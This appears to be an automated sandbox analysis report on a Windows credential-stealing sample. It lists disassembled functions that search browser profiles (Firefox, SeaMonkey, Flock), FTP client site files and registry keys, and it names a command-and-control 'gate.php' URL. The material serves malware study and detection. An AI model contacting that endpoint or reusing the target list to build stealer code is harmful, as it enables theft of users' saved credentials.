String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
API String ID: 3007406096-624000163
Opcode ID: 546172b5acdf1ea1aad6dde161a3faaed030af3c782d229cb69f39b5eb439197
Instruction ID: 18047dae9285ce2798a79d6f69f23a44ce7d60987fa051ef70a0d4c4a017fd84
Opcode Fuzzy Hash: 546172b5acdf1ea1aad6dde161a3faaed030af3c782d229cb69f39b5eb439197
Instruction Fuzzy Hash: 2B015270680204BADB10BF61CC07FD97A259B44748F11802A7A05750E3DBBD9A90965C

Uniqueness

Uniqueness Score: -1.00%

Function 0040FBE5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92sleepfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00403F65: WSAStartup.WSOCK32(00000101,?,?,0040FBF8), ref: 00403F7A

DeleteFileA.KERNEL32(out.bin), ref: 0040FBFD

Part of subcall function 00401000: 756A4620.OLE32(00000000,00000001,?,?,00402094,?,?,?,?,004103E4), ref: 0040100E

Sleep.KERNEL32(00001388,00000000,http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.php,00000000,00000000,00000000,?,00000000,out.bin), ref: 0040FCB9

Strings

out.bin, xrefs: 0040FBF8
Client Hash, xrefs: 0040FCDC
http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.php, xrefs: 0040FC4F, 0040FC6B

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: A4620DeleteFileSleepStartup
String ID: Client Hash$http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.php$out.bin
API String ID: 1134967436-4076469128
Opcode ID: 564f58b4ffaaafae1cdbee3fdc97b58fef5d1dcc03025d2e21f577c87d8226e3
Instruction ID: 09f8760c8b5a76081fb371085a20cc9ebf829c0e7c070a1cd3aa8e5b74bb238a
Opcode Fuzzy Hash: 564f58b4ffaaafae1cdbee3fdc97b58fef5d1dcc03025d2e21f577c87d8226e3
Instruction Fuzzy Hash: EC31467191824E9AEF31ABE189477BF7A78BB00348F10003BE50071AD1D6BD4989D76A

Uniqueness

Uniqueness Score: -1.00%

Function 00409BA6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85registryCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,?), ref: 00409BB2
RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409C29
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409C55
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409C9D

Part of subcall function 004023B3: lstrlen.KERNEL32(?,?,00000000), ref: 004023C7
Part of subcall function 004023B3: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 004023E6
Part of subcall function 004023B3: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023F8
Part of subcall function 004023B3: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040240A

Part of subcall function 00401DD4: lstrlen.KERNEL32(?,?,?,00402121,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DF5
Part of subcall function 00401DD4: lstrlen.KERNEL32(?,?,?,?,00402121,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401DFF
Part of subcall function 00401DD4: lstrcpy.KERNEL32(00000000,?), ref: 00401E13
Part of subcall function 00401DD4: lstrcat.KERNEL32(00000000,?), ref: 00401E1C

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

PathToExe, xrefs: 00409BBD

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
String ID: PathToExe
API String ID: 3012581338-1982016430
Opcode ID: cacc51e63eff8bc27502df48bef2ca2e162a879b432f6904293fcb735aa6e41a
Instruction ID: f405e869f91df3b5bd0393db00b4c4018cd157ad6fbf54ccf9ea2cbad7995da0
Opcode Fuzzy Hash: cacc51e63eff8bc27502df48bef2ca2e162a879b432f6904293fcb735aa6e41a
Instruction Fuzzy Hash: 0A31DB71954109BADF11AFA2CD02FEE7E75AF04348F10443AB610740E2DB7A9A60AB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040277F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?,Software\WinRAR,?,?,?,?,0040FAAA,Client Hash,?,?,?), ref: 004027B5

Part of subcall function 00401000: 756A4620.OLE32(00000000,00000001,?,?,00402094,?,?,?,?,004103E4), ref: 0040100E

756D19A0.OLE32(?,?,?,00000000,?,00000000,?,?,?,?,00000104,?,Software\WinRAR,?,?), ref: 00402837
GlobalFix.KERNEL32(?), ref: 00402843
GlobalUnWire.KERNEL32(?), ref: 00402865

Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DA1
Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DAB
Part of subcall function 00401D80: lstrcpy.KERNEL32(00000000,?), ref: 00401DBF
Part of subcall function 00401D80: lstrcat.KERNEL32(00000000,?), ref: 00401DC8

Part of subcall function 00401DD4: lstrlen.KERNEL32(?,?,?,00402121,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DF5
Part of subcall function 00401DD4: lstrlen.KERNEL32(?,?,?,?,00402121,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401DFF
Part of subcall function 00401DD4: lstrcpy.KERNEL32(00000000,?), ref: 00401E13
Part of subcall function 00401DD4: lstrcat.KERNEL32(00000000,?), ref: 00401E1C

Strings

Software\WinRAR, xrefs: 0040278F

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$Globallstrcatlstrcpy$A4620PathTempWire
String ID: Software\WinRAR
API String ID: 736744956-224198155
Opcode ID: 1bc4a5afd911ec56f7c296e2f58174c65cd95b73ef1e1d2cda9ce479f616601f
Instruction ID: 6de8235985a4e012031a15d511cfb711ca9816c49f2bad4b93719ad3a4c48ce6
Opcode Fuzzy Hash: 1bc4a5afd911ec56f7c296e2f58174c65cd95b73ef1e1d2cda9ce479f616601f
Instruction Fuzzy Hash: 81212C7690010DBADF05BBA2CD4ADDE7A7DAF04348F108576BA04F10E1DBB9DE909B18

Uniqueness

Uniqueness Score: -1.00%

Function 00404777 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040478D
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 004047C6
StrStrIA.SHLWAPI(?,Line), ref: 004047F7
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 0040487C

Strings

Line, xrefs: 004047EB

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID: Line
API String ID: 4012628704-1898322888
Opcode ID: 00f49f2164cfccc038cfa0bf51d9e808ffcedcf99f1b24101f4ab87a3df4a7b6
Instruction ID: 96b309fa3d8d30f1d5783b5218dd4bef2efb828f215c902116ecbc2af092ee0c
Opcode Fuzzy Hash: 00f49f2164cfccc038cfa0bf51d9e808ffcedcf99f1b24101f4ab87a3df4a7b6
Instruction Fuzzy Hash: FF214B7580011CFADF21AB91CC41BEEBBB9BF44304F10C4B6B644B11A0CB799B919F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E2EA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E2FD
RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E336
StrStrIA.SHLWAPI(?,.wjf,00000000,000007FF,?,?), ref: 0040E37D
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E3AA

Strings

.wjf, xrefs: 0040E372

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID: .wjf
API String ID: 4012628704-198459012
Opcode ID: 7df8208f6d8b9fbd9f03756490d0bef1432451b6ad5a77d764c6cd9b028255f7
Instruction ID: a39f0cc25358ef3fe378c5470b51181d1204abcc80f0feab624c8e793c0f5b93
Opcode Fuzzy Hash: 7df8208f6d8b9fbd9f03756490d0bef1432451b6ad5a77d764c6cd9b028255f7
Instruction Fuzzy Hash: B7112C3191010CBADF11AB92CC01BEEBFB9BF00304F0484B6B904B10A0DBB99BA19F95

Uniqueness

Uniqueness Score: -1.00%

Function 004044D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040277F: GetTempPathA.KERNEL32(00000104,?,Software\WinRAR,?,?,?,?,0040FAAA,Client Hash,?,?,?), ref: 004027B5
Part of subcall function 0040277F: 756D19A0.OLE32(?,?,?,00000000,?,00000000,?,?,?,?,00000104,?,Software\WinRAR,?,?), ref: 00402837
Part of subcall function 0040277F: GlobalFix.KERNEL32(?), ref: 00402843
Part of subcall function 0040277F: GlobalUnWire.KERNEL32(?), ref: 00402865

756C6F40.OLE32(?,00000000,HWID,?), ref: 004044F9
wsprintfA.USER32 ref: 00404540
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,HWID,?), ref: 0040454C

Strings

{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 00404537
HWID, xrefs: 004044E0, 00404556

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Global$PathTempWirelstrlenwsprintf
String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
API String ID: 1250355450-1100116640
Opcode ID: 313ff0071286941cb880cc1c36ba716fa840869ebded599ce7aff12e9312e8a8
Instruction ID: 3095b530aed22146c5ad806403ae0e42f89d383abe0f1a9f1724f7095cfc90b4
Opcode Fuzzy Hash: 313ff0071286941cb880cc1c36ba716fa840869ebded599ce7aff12e9312e8a8
Instruction Fuzzy Hash: 1C115BA68041987DCB61E6F64C05EFFBAFC5D0C205B1400ABB7A0E20C2D57DD7409B38

Uniqueness

Uniqueness Score: -1.00%

Function 00409CAE Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409CDC

Part of subcall function 00409BA6: StrStrIA.SHLWAPI(?,?), ref: 00409BB2
Part of subcall function 00409BA6: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409C29
Part of subcall function 00409BA6: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409C55
Part of subcall function 00409BA6: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409C9D

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409D21

Strings

Software\Mozilla, xrefs: 00409CEB, 00409D08
Firefox, xrefs: 00409CE6, 00409D03
\Mozilla\Firefox\, xrefs: 00409CE1, 00409CFE

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
API String ID: 3062143572-2631691096
Opcode ID: 894ffc9cf653845bb4616532f4e8c5797a19884fb5ffe7d35fcafcbfd7067fdd
Instruction ID: ac8f48867af314f8120b7c81e644b7f5cce5841a03552995b2f05bc08e48feab
Opcode Fuzzy Hash: 894ffc9cf653845bb4616532f4e8c5797a19884fb5ffe7d35fcafcbfd7067fdd
Instruction Fuzzy Hash: 23F01D71680208BACB10AF91CC43FC97B65AB54758F618066BA05750E3DBBD9AD09B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00409DEB Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409E19

Part of subcall function 00409BA6: StrStrIA.SHLWAPI(?,?), ref: 00409BB2
Part of subcall function 00409BA6: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409C29
Part of subcall function 00409BA6: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409C55
Part of subcall function 00409BA6: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409C9D

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409E5E

Strings

Software\Mozilla, xrefs: 00409E28, 00409E45
\Mozilla\SeaMonkey\, xrefs: 00409E1E, 00409E3B
SeaMonkey, xrefs: 00409E23, 00409E40

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
API String ID: 3062143572-164276155
Opcode ID: cabea9b5cee6c2f4a086e29282497f301371a421d3fa787b8fb0a948d5f26e0c
Instruction ID: 1a02e282308be8e293e02f173dc651cb04350ae71c26ba7f143dd056e4a95337
Opcode Fuzzy Hash: cabea9b5cee6c2f4a086e29282497f301371a421d3fa787b8fb0a948d5f26e0c
Instruction Fuzzy Hash: 06F030B0A80208BACB10AF91CC43FDD3A69AB44748F114166B648750E3DBB9DAD19B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00409E72 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409EA0

Part of subcall function 00409BA6: StrStrIA.SHLWAPI(?,?), ref: 00409BB2
Part of subcall function 00409BA6: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409C29
Part of subcall function 00409BA6: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409C55
Part of subcall function 00409BA6: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409C9D

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409EE5

Strings

Software\Mozilla, xrefs: 00409EAF, 00409ECC
Flock, xrefs: 00409EAA, 00409EC7
\Flock\Browser\, xrefs: 00409EA5, 00409EC2

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Flock$Software\Mozilla$\Flock\Browser\
API String ID: 3062143572-1276807325
Opcode ID: 12ae3cc360cc347b6ed7f42ad4a061b79ba278fb8cf64f622ff722e30480d196
Instruction ID: a1154479a53383609def9f1c5618678725f64423bda0b2487eecab4fa5f649e3
Opcode Fuzzy Hash: 12ae3cc360cc347b6ed7f42ad4a061b79ba278fb8cf64f622ff722e30480d196
Instruction Fuzzy Hash: CCF03A70A80248BEEF10EF91CC47FCD3A65AB44748F214166BA08750E3DBB9DAD09B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00409EF9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409F27

Part of subcall function 00409BA6: StrStrIA.SHLWAPI(?,?), ref: 00409BB2
Part of subcall function 00409BA6: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409C29
Part of subcall function 00409BA6: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409C55
Part of subcall function 00409BA6: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409C9D

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409F6C

Strings

Software\Mozilla, xrefs: 00409F36, 00409F53
\Mozilla\Profiles\, xrefs: 00409F2C, 00409F49
Mozilla, xrefs: 00409F31, 00409F4E

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
API String ID: 3062143572-2716603926
Opcode ID: dec9201f8b07fefaa26df5f619087dd1d83cd244068640bdecf8cdb5474dbdfa
Instruction ID: 856e83eb3368eacf35aedb28de63341b0b3bd2119f8fd71623a28586f55a65dc
Opcode Fuzzy Hash: dec9201f8b07fefaa26df5f619087dd1d83cd244068640bdecf8cdb5474dbdfa
Instruction Fuzzy Hash: F7F03070680208BACB10AF91DC47FCD3A79AB44748F114066BA04750E3DBB9DBD49B5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9C3 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(006B2290,3D-FTP), ref: 0040C9EA

Part of subcall function 004023B3: lstrlen.KERNEL32(?,?,00000000), ref: 004023C7
Part of subcall function 004023B3: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 004023E6
Part of subcall function 004023B3: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023F8
Part of subcall function 004023B3: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040240A

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

\3D-FTP, xrefs: 0040CA2F
sites.ini, xrefs: 0040CA03, 0040CA40, 0040CA6F
3D-FTP, xrefs: 0040C9E4
\SiteDesigner, xrefs: 0040CA5E

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
API String ID: 1884169789-4074339522
Opcode ID: e730872d66c1f5c9dd6b490c5f7fd60bb1f98691bce16d44a80439a71d1d54ef
Instruction ID: 8192517b5594e50964869f632d02b595f24cc106a1d64f8e283138a1e08fffc8
Opcode Fuzzy Hash: e730872d66c1f5c9dd6b490c5f7fd60bb1f98691bce16d44a80439a71d1d54ef
Instruction Fuzzy Hash: 161151B0600105B9DB11BB728C43FAF3E599B8178CF11413B7914B55E3DBBCDA5196AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040AE57
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AE8B
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AF73

Part of subcall function 0040ABA8: wsprintfA.USER32 ref: 0040AC14
Part of subcall function 0040ABA8: wsprintfA.USER32 ref: 0040AC27
Part of subcall function 0040ABA8: wsprintfA.USER32 ref: 0040AC3A
Part of subcall function 0040ABA8: wsprintfA.USER32 ref: 0040AC4D
Part of subcall function 0040ABA8: wsprintfA.USER32 ref: 0040AC60
Part of subcall function 0040ABA8: wsprintfA.USER32 ref: 0040AC73
Part of subcall function 0040ABA8: wsprintfA.USER32 ref: 0040AC86

Strings

SiteServers, xrefs: 0040AEC5

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: wsprintf$CloseEnumOpen
String ID: SiteServers
API String ID: 1693054222-2402683488
Opcode ID: 58bd38f031dc513c390d68e5366677cee3399b2056e8071abc0a33e61efa7b84
Instruction ID: 8459014f039a0a84bd9aa5f3e094c7e6e2aadf1454260e4fbffc6eb5301dd480
Opcode Fuzzy Hash: 58bd38f031dc513c390d68e5366677cee3399b2056e8071abc0a33e61efa7b84
Instruction Fuzzy Hash: 7C311E7190021CEADF21AB91CC02BDEBAB9BF04344F14C0B6B144710A1CF795B929F9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408C88 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408C9B
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408CCF
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408D6E

Strings

MRU, xrefs: 00408D07

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: MRU
API String ID: 1332880857-344939820
Opcode ID: 76c651e43131b734bd85b2e6db83d97133d120864182c8ee642e878c4378d59b
Instruction ID: 0084d24c220240b52ec936078940ff440fafe8c638699adad89ba2b41403c2d0
Opcode Fuzzy Hash: 76c651e43131b734bd85b2e6db83d97133d120864182c8ee642e878c4378d59b
Instruction Fuzzy Hash: 5121183194410CBADF11AF51CD02BDEBABABF00344F1085BAB554B50A1DFB99B91AF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401C15 Relevance: 6.1, APIs: 4, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401C5A
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401C75
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401CAB
RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401CCD

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 3506204eec1300c9fd2521453c2ae32e1fc0146e8e5aaca90c259f7dded7bded
Instruction ID: 360f4102227be2a7bea43436c032bb289b6fc87370e38f427ef6ca43fb260b94
Opcode Fuzzy Hash: 3506204eec1300c9fd2521453c2ae32e1fc0146e8e5aaca90c259f7dded7bded
